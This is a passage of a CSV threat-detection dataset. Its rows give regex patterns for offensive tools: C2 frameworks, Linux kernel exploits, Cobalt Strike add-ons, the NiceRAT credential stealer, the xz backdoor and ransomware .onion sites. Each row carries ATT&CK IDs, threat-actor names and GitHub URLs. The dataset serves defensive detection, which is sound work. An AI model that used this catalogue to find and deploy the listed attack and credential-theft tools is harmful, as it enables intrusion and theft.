- Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","45431" "*fuse_evil.*",".{0,1000}fuse_evil\..{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tool","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","N/A","3","204","39","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z","45432" 
"*fuse_lowlevel.h*",".{0,1000}fuse_lowlevel\.h.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","N/A","4","369","56","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z","45433" "*fuxploider --url * --not-regex ""wrong file type""*",".{0,1000}fuxploider\s\-\-url\s.{0,1000}\s\-\-not\-regex\s\""wrong\sfile\stype\"".{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","45434" "*fuxploider*",".{0,1000}fuxploider.{0,1000}","offensive_tool_keyword","fuxploider","Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. 
This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.","T1526 - T1505 - T1506 - T1574","TA0006 - TA0008","N/A","N/A","Vulnerability Scanner","https://github.com/almandin/fuxploider","1","0","N/A","N/A","N/A","10","3188","511","2023-04-16T19:57:12Z","2017-07-14T09:30:06Z","45435" "*fuzz_option.pl*",".{0,1000}fuzz_option\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","45436" "*fuzzdb*",".{0,1000}fuzzdb.{0,1000}","offensive_tool_keyword","fuzzdb","FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. Its the first and most comprehensive open dictionary of fault injection patterns. predictable resource locations. 
and regex for matching server responses.","T1190 - T1191 - T1192 - T1193 - T1197","TA0002 - TA0008","N/A","N/A","Vulnerability Scanner","https://github.com/fuzzdb-project/fuzzdb","1","0","N/A","N/A","N/A","10","8493","2122","2023-11-10T16:15:18Z","2015-09-10T17:54:31Z","45437" "*fuzzers/rippackets.pl*",".{0,1000}fuzzers\/rippackets\.pl.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","45438" "*fuzzfactory.py*",".{0,1000}fuzzfactory\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","45439" "*fuzzrequest.py*",".{0,1000}fuzzrequest\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","45440" "*FuzzySecurity/Dendrobate*",".{0,1000}FuzzySecurity\/Dendrobate.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","45441" "*FuzzySecurity/Sharp-Suite*",".{0,1000}FuzzySecurity\/Sharp\-Suite.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 
- TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","45442" "*FuzzySecurity/StandIn*",".{0,1000}FuzzySecurity\/StandIn.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","45443" "*fw_walk disable*",".{0,1000}fw_walk\sdisable.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - 
Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","45444" "*g_hDesk = Funcs::pOpenDesktopA(g_desktopName*",".{0,1000}g_hDesk\s\=\sFuncs\:\:pOpenDesktopA\(g_desktopName.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","45445" "*g_hookedSleep.*",".{0,1000}g_hookedSleep\..{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","45446" 
"*g0h4n/RDE1*",".{0,1000}g0h4n\/RDE1.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","45447" "*g0h4n/REC2*",".{0,1000}g0h4n\/REC2.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","45448" "*G0ldenGunSec/GetWebDAVStatus*",".{0,1000}G0ldenGunSec\/GetWebDAVStatus.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - 
DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","45449" "*G0ldenGunSec/SharpSecDump*",".{0,1000}G0ldenGunSec\/SharpSecDump.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","45450" "*G1Q+4a0TgAHnlq2B8BKLZUP6wDHsjX6F5nVtUTU3dBQ*",".{0,1000}G1Q\+4a0TgAHnlq2B8BKLZUP6wDHsjX6F5nVtUTU3dBQ.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","N/A","https://www.wiz.io/blog/cve-2024-3094-critical-rce-vulnerability-found-in-xz-utils#latest-wiz-research-findings-as-of-april-3-2024-33","10","10","N/A","N/A","N/A","N/A","45451" "*G374U70F111(*",".{0,1000}G374U70F111\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - 
T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45454" "*G3770K3N(*",".{0,1000}G3770K3N\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45455" "*G3770K3N1NF0(*",".{0,1000}G3770K3N1NF0\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45456" "*G37800KM4rK5(*",".{0,1000}G37800KM4rK5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45457" "*G3781111N6(*",".{0,1000}G3781111N6\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45458" "*G3784D63(*",".{0,1000}G3784D63\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of 
cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45459" "*G378r0W53r5(br0W53rP47H5)*",".{0,1000}G378r0W53r5\(br0W53rP47H5\).{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45460" "*G37C00K13(*",".{0,1000}G37C00K13\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45461" "*G37C0D35(*",".{0,1000}G37C0D35\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45462" "*G37CC5(*",".{0,1000}G37CC5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45463" 
"*G37D15C0rD(*",".{0,1000}G37D15C0rD\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45464" "*G37D474(*",".{0,1000}G37D474\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45465" "*G37H1570rY(*",".{0,1000}G37H1570rY\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45466" "*G37P455W(*",".{0,1000}G37P455W\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45467" "*G37UHQ6U11D5(*",".{0,1000}G37UHQ6U11D5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45468" "*G37UHQFr13ND5(*",".{0,1000}G37UHQFr13ND5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45469" "*G37W3851735(*",".{0,1000}G37W3851735\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45470" "*g3tsyst3m/undertheradar*",".{0,1000}g3tsyst3m\/undertheradar.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","45471" "*G47H3rZ1P5(*",".{0,1000}G47H3rZ1P5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45472" "*gabriellandau/PPLFault*",".{0,1000}gabriellandau\/PPLFault.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as 
WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","45473" "*GadgetToJScript.csproj*",".{0,1000}GadgetToJScript\.csproj.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","45474" "*GadgetToJScript.exe -a *",".{0,1000}GadgetToJScript\.exe\s\-a\s.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon 
Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","0","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","45475" "*GadgetToJScript.sln*",".{0,1000}GadgetToJScript\.sln.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","45476" "*GadgetToJScript-master*",".{0,1000}GadgetToJScript\-master.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","45477" "*Gality369/CS-Loader*",".{0,1000}Gality369\/CS\-Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","45478" "*gamol6n6p2p4c3ad7gxmx3ur7wwdwlywebo2azv3vv5qlmjmole2zbyd.onion*",".{0,1000}gamol6n6p2p4c3ad7gxmx3ur7wwdwlywebo2azv3vv5qlmjmole2zbyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","45479" "*gandcrabmfe6mnef.onion*",".{0,1000}gandcrabmfe6mnef\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
